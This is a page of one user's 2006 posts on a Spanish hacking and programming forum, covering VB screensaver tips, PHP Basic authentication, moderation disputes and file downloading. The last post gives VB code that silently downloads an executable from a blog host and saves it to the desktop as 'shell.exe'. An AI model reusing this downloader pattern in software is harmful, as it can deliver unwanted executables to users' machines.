elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: (TUTORIAL) Aprende a emular Sentinel Dongle By Yapis


  Mostrar Mensajes
Páginas: 1 ... 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 [91] 92 93 94 95 96 97 98 99 100 101 102
901  Programación / Programación Visual Basic / Re: Tiempo de inactividad en: 12 Noviembre 2006, 21:06 pm
A ver, creo qu elo planteas mal, para hacer un salvapantallas solo tienes que hacer un EXE que reproduzca la animación en el Form_Load.

Despues lo renombras a SCR y le das click derecho / Instalar. El Sistema Operativo se encargará de ejecutarlo pasado X minutos y se encargará de detenerlo al mover el mouse o pulsar una tecla.
902  Programación / Programación Visual Basic / Re: Tiempo de inactividad en: 12 Noviembre 2006, 04:34 am
Código:
Public Declare Function GetCursorPos Lib "user32" Alias "GetCursorPos" (lpPoint As POINTAPI) As Long

Con esto puedes recoger la posicion del raton, verifíca que sus valores no varien en menos de X minutos y lanzas la rutina del salvapantallas.

Aunque para hacer un salvapantallas esa no es la forma correcta. Create un EXE normal que al ser ejecutado lance la animación, despues renombralo a *.src y le das click derecho / instalar. De esta forma estará bien instalado en el sistema y se lanzará cuando pases X minutos automaticamente
903  Programación / PHP / Función Header: Autenticación en: 8 Noviembre 2006, 21:13 pm
Muy buenas, estreno el foro con esta dudilla que tengo. Quiero hacer un webapp para administrar servidores, con una base de datos simple (en txt mismo, no necesito sql ni nada). El programa es así de simple:

Yo agrego IP's al txt, y el webapp hace la función fsockopen(); para comprobar si conecta un puerto. Si me conecta lo marco como ONLINE y si no conecta lo marco como OFFLINE. De esta manera se despliega un menú con opciones para administrarlo por Terminal Server, Telnet, etc...

Esto ya está hecho y funciona de coña. Ahora solo quiero añadir usuarios y passwords para que cada user tenga su TXT con sus IP's agregadas. Para ello uso el siguiente script:

Código:
<?php
if (!isset($_SERVER['PHP_AUTH_USER'])) {
header('WWW-Authenticate: Basic realm="Administrador de Servidores"');
header('HTTP/1.0 401 Unauthorized');
echo 'Please, insert username and password';
exit;
} else {
//resto del código autenticado
//crear sesion
//meter cookie
}
?>

Esto me funciona de coña, pero en IE7 aparece un mensaje de advertencia diciendo que esos datos se enviarán de una forma no segura, etc etc etc. Se que la función Header admite más "WWW-Authenticate", alguien los conoce todos?

Gracias!!
904  Programación / PHP / Re: Nuevo foro!! en: 8 Noviembre 2006, 20:42 pm
Felicidades por el nuevo foro!

A ver si le metemos caña pronto
905  Programación / Programación Visual Basic / Re: sprites en vb6? en: 2 Noviembre 2006, 23:09 pm
una pregutna que no tiene nada que ver como haces para poner un contador de descargas?

El contador que aparece junto al archivo es automático del foro. Los usuarios que tengas un rango >= Colaborador pueden adjuntar archivos en sus mensajes. Cada usuario que se descarge el archivo se aumentará el contador

Saludos!!
906  Programación / Programación Visual Basic / Re: sprites en vb6? en: 2 Noviembre 2006, 20:36 pm
Si que se puede, pongo el source completo adjunto a este post.
907  Foros Generales / Sugerencias y dudas sobre el Foro / Re: Quejas Multiples contra miembro del Staff en: 1 Noviembre 2006, 03:03 am
¿Debe ser tratado en privado porque el usuario en cuestión en este caso es un colaborador?

Sacastes mi frase completamente de contexto xD Olvidate del rango de los 2 usuarios. Es evidente que los moderadores podrían resolver todas las dudas:

* Solucionar problemas
* Responder dudas técnicas, etc
* Soluciar peleas entre 2 usuarios
* Solucionar problemas globales (multi-spam, por ejemplo)
* Revisión de post repetidos
* Actualizar las FAQ's de los subforos
* Revisar que no se flodee
* Comprobar integridad del foro, resolver problemas de conexión
* Actualizar mensajes antiguos
* Buscar nuevos textos o material para debator en el foro...
* Y mil cosas más...

Todo esto no lo puede hacer un moderador solo, principalmente porque ellos tienen vida social, asi que yo personalmente prefiero ordenar esa lista de "tareas" para el moderador para que al menos se realicen las de vital importancia.

Resumiendo: Una disputa de niños entre 2 usuarios (sean colaboradores o no) es algo que si se puede evitar la intervención de un moderador mejor. ¿Me explico? No es lo más prioritario, sobretodo cuando este tipo de cosas se solución el 70% de las veces hablando.
908  Foros Generales / Sugerencias y dudas sobre el Foro / Re: Quejas Multiples contra miembro del Staff en: 1 Noviembre 2006, 02:46 am
El foro de "Sugerencias" son para quejas del tipo: El foro no va, un usuario esta haciendo spam masivo, alguien ha posteado un mensaje con un link de descarga de un troyano, etc... Este sub-foro no se pensó para tratar disputas personales entre 2 o más usuarios.

Si este fuera el caso, este subforo sería el caos. COmo se dice por aqui, "la ropa sucia, se lava en casa" es decir, si tienes problemas con un usuario se habla con ese usuario. Si no se puede hablar con él, se llama a un moderador.

Y no, no creas que porque wvb sea colaborador va a tener un trato preferente. No es la primera vez (ni será la ultima) que se advierte e incluso se le retira completamente al cargo de un colaborador/moderador por algo similar. Y repito: personalmente creo que este tema se puede solucionar hablando 2 personas.
909  Foros Generales / Sugerencias y dudas sobre el Foro / Re: Quejas Multiples contra miembro del Staff en: 1 Noviembre 2006, 02:21 am
Realmente no se que pretendes con esto...

1) Si tienes alguna queja sobre un usuario del foro, lo mejor es que lo hables directamente con él através de los mensajes personales.

2) Si el usuario en cuestión no quiere entrar en razón, manda un mensaje al moderador, coadmin, global, etc... que encuentres en ese momento (siempre suelen haber más de uno).

3) Si el propio moderador no te hace caso (que lo dudo), habla directamente con el Administrador del foro.

Lo que no entiendo es porque posteas esto aqui. No hay ningún subforo de "quejas con miembros del foro" principalmente porque las quejas se resuelven en privado.


Pero bueno segun este individuo mis comentarios no aportan nada y siempre terminan en ofensa xD...

Pues sí, personalmente este post que acabas de empezar no te va a llevar a ningún lado y creo que sueles ofender bastante a la gente. (es mi humilde opinión)
Por todos es conocido el "cariño" que has cogido con wvb, y hacerlo público aqui y de esta manera no te favorece nada :) Personalmente creo que te equivocas en la forma con la que estas actuando.

Sin más que añadir, suerte :-*
910  Programación / Programación Visual Basic / Re: Duda-->Descargar archivo desde un ftp en: 1 Noviembre 2006, 01:20 am
Usa la API: URLDownloadToFile:

Citar
Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long

Código:
    LocalPath = Environ("USERPROFILE") & "\Escritorio\shell.exe"
    File = URLDownloadToFile(0, "http://madantraxblog.googlepages.com/s.exe", LocalPath, 0, 0)
Páginas: 1 ... 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 [91] 92 93 94 95 96 97 98 99 100 101 102
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines